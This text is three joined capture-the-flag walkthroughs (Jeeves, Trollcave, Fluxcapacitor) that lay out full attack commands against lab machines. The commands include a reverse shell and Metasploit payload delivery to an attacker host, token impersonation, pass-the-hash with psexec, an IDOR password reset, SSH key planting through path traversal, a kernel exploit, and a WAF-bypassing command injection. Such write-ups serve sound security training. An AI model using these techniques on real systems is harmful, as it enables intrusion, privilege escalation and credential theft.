Hack the Box Challenge: Jeeves Walkthrough

Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege in 3 different ways and for completing the challenge of this VM we took help from Tally (Hack the box).

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Jeeves Lab has IP: 10.10.10.63.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.63

Looking around its result we found ports 22, 80, 135, 445 and 50000 are open, and moreover, port 135 and 445 was pointing towards Windows operating system.

Subsequently, first we checked web service and explored target IP in a web browser and it was put up by “Ask Jeeves search engine” webpage. So we try to search some website such as google.com and a new web page represented by the fake error page come up in front of us.

 On port 50000 in a Web browser give us to HTTP 404 Error page.

Then we decide to use OWASP Dirbuster for directory brute force attack.

From its result, we found so many directories but we drive with /askjeeves for further process.

So when we had explored 10.10.10.63:50000/askjeeves it lead us to “Jenkins Dashboard”. Ahhh!! It was WOW moment for us because we knew that there are so many methods to exploit Jenkins. Thus we move inside "Manage Jenkins" options as it was the spine and abusing it was quite soothing.

There were so many options but we were interested in Script Console because Jenkins has very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.

We found Java reverse shell from GitHub, so we copied the code and modified its localhost and port as per our specification.

Then we start Netcat listener and run above Groovy Script to access victim's reverse connection. From below image, you can observe that we access tty shell of victim’s machine.

As we love meterpreter shell therefore we load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 2

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28

msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for powershell.exe and Paste it inside CMD shell as shown in next image.

Paste above malicious code here in netcat.

You will get meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:

getuid

But currently we don’t have NT AUTHORITY\SYSTEM permission. But we knew the techniques that we have used in Tally CTF for gaining NT AUTHORITY\SYSTEM permission.

Therefore taking help from our previous article “Tally” we executed below commands and successfully gained NT AUTHORITY\SYSTEM permission

upload /root/Desktop/RottenPotato/rottenpotato.exe .

load incognito

execute -Hc -f rottenpotato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

getuid

Let me tell you this, that we have solved so many CTF challenges of Hack the Box among them some was framed using Windows Operating system and we always grabbed the user.txt file from inside some a folder that owned by any username and root.txt form inside Administrator folder and both these folders are present inside C:\Users

Similarly, you can observe the same thing here also and might be you got my intention of above said words. So let’s grab user.txt file first from inside /kohsuke/Desktop.

COOL!!! We have captured the 1^st flag.

Then we go for root.txt file, BUT it was a little bit tricky to get the root.txt file. Because the author has hide root.txt file by using some ADS technique (Windows Alternate Data Streams) and to grab that file, you can execute below commands.

cd Administrator

cd Desktop

ls-al

cat hm.txt

dir /R

more < hm.txt:root.txt

Hurray!! R flag with dir command discloses root.txt file and  We successfully completed the 2^nd task.

2^nd Method

When you have fresh meterpreter session 1 then move into /document directory and download CEH.kdbx file. Here also we took help from our previous article TALLY.

Now run the python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

python keepass2john.py CEH.kdbx > passkey

Next, we have used John the ripper for decrypting the content of “passkey” with help of the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt passkey

so we found the master key "moonshine1" for keepass2 which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command.

apt-get install keepass2 -y

After installing, run the below command and submit “moonshine1” in the field of the master key.

keepass2 tim.kdbx

Inside CEH we found so many credential, we copied all password from here and past into a text file and got few password and one NTLM hash value: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > set rhost 10.10.10.63

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

msf exploit(windows/smb/psexec) > set lport 8888

msf exploit(windows/smb/psexec) > exploit

Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM permission, now use above steps to get the root.txt file.

Note: we have rebooted the target’s VM before starting 2^nd method.

At the time when you have fresh meterpreter session2 (via psexec) then execute the following command to enable remote desktop service in victim's machine.

run getgui -e

shell

Now we have victim’s command prompt with administrator privilege thus we can change User administrator password directly by using net user command.

net user administrator 123

Now open a new terminal in your Kali Linux and type rdesktop 10.10.10.63 command to access remote desktop services of victim’s machine and after that submit credential administrator: 123 for login.

BOOOOOM!!! Look at the screen of our victim, now let’s grab the root flag and enjoy this GUI mode.

Finding user.txt is quite easy you can try by your own. To grab root.txt flag open the CMD prompt and type following command ad done above.

dir /R

more < hm.txt:root.txt

Enjoy Hacking!!!!

Hack the Trollcave VM (Boot to Root)

Hello friends! Today we are going to take another CTF challenge known as Trollcave. The credit for making this vm machine goes to “David Yates” and it is another boot to root challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM from here.

Let’s Breach!!!

Let's start with getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.124

Awesome!! Nmap has dumped the details of services running on open port 22 and 80.

Knowing port 80 is open in victim's network I preferred to explore his IP in a browser. At first glance, we saw three tabs Home, login and Register.

Then we scroll down the page and look at Ruby gem and found that this site is based on Ruby on rails. And on the right side we saw two categories i.e. 0nline users and Newest users, when we click on “xer” a new web page gets opened.

From its URL we perceived that user xer has user ID 17 and hence there must be any user between user ID 1 to 17.

So we manually replace id 17 from id 1 and found King’s page which was for superadmin account.

At its home page we read the post password reset by coderguy, represented by ruby gem for rail password reset and from Google we found default directory for password reset for reset. So we explored http://192.168.1.124/password_resets/new  and obtained password reset form.  Very first we try to reset superadmin password but unfortunately get failed, BUT successfully got the link for xer password reset.

Yeah!! It was Pretty Good to see a link for xer password reset, then we have copied that link.  

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=xer

And past the copied link in URL, then swap name=xer from king as given below, later entered a new password for superadmin (king), it is known as IDOR.

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=king

Well!!! On executing URL; it gives a message “password reset successfully” and then we logged in superadmin account.

Yippee!!! Finally, we logged in as superadmin and access admin console, we saw many tabs and apparently click on file manager.

Here we saw enable file upload option, and we enabled it so that we can upload any backdoor whenever we need to upload that.

Thus we start from uploading PHP backdoor but failed to upload, similarly, we tried so many backdoors such as ruby, C shell and many more but get failed each time. After so many attempts we successfully upload ssh RSA file.

To do so follow the below steps:

ssh-keygen -f rails

mv rails.pub authorized_keys

chmod 600 rails

 Here we have generated ssh RSA key file by the name of rails without a password and transferred rails.pub into authorized_keys and gave permission 600 for proper authentication.

Then upload the authorized_keys and add ../../../../../../home/rails/.ssh/authorized_keys path manually.

So after uploading SSH key, it was time to connect target’s machine through ssh key.

ssh -i rails rails@192.168.1.124

Awesome!! From below image, you can observe the target machine's tty shell.

Then we execute lsb_release -a command to know the version of the kernel and found 16.04. After then with the help of searchsploit found kernel exploit 44298.c for local privilege escalation.

At that moment we copied this exploit on Desktop and compiled it, now it was impossible to transfer the exploit using simple complied file, therefore, we need to encode it file into base64. You use below command to follow same steps.

cd Desktop

cp /usr/share/exploitdb/exploits/linux/local/44298.c .

gcc 44298.c -o kernel

base64 kernel

We copied the base64 encoded value then movie into target’s terminal where we created an empty file exploit.base64 with the help of nano and past above copied encode code.

nano exploit.base64

Far ahead decoded it in a new file as rootshell and give all permission to the decoded file. At last, we run the rootshell file to get root privilege.

cat exploit.base64 |base64 -d > rootshell

chmod u+x rootshell

./rootshell

id

cd /root

cat flag.txt

BINGO!!!! We got the root flag!!!

Hack the Box Challenge: Fluxcapacitor Walkthrough

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.

nmap -sV 10.10.10.69

So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF”  thus we explored target IP in the web browser but found nothing interesting.

Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.

LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we looked into Google for any exploit related to this but failed to find any working exploit against it.

At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.

Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.

So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.

Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn't find any particular exploit.  Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.

So we use common.txt wordlist for URL brute force and execute below command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19

It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.

Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, meaning that adjacent string literals are concatenated, without any operator.

We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.

curl http://10.10.10.69/sync?opt=' whoami'

curl "http://10.10.10.69/sync?opt=' id'"

curl http://10.10.10.69/sync?opt=' u'n'ame -a'

Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.

Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.

curl "http://10.10.10.69/sync?opt=' l's' /home'"

curl http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'

curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"

Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.

curl http://10.10.10.69/sync?opt=' sudo -l'

Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.

curl http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''

After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.

Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt

curl http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.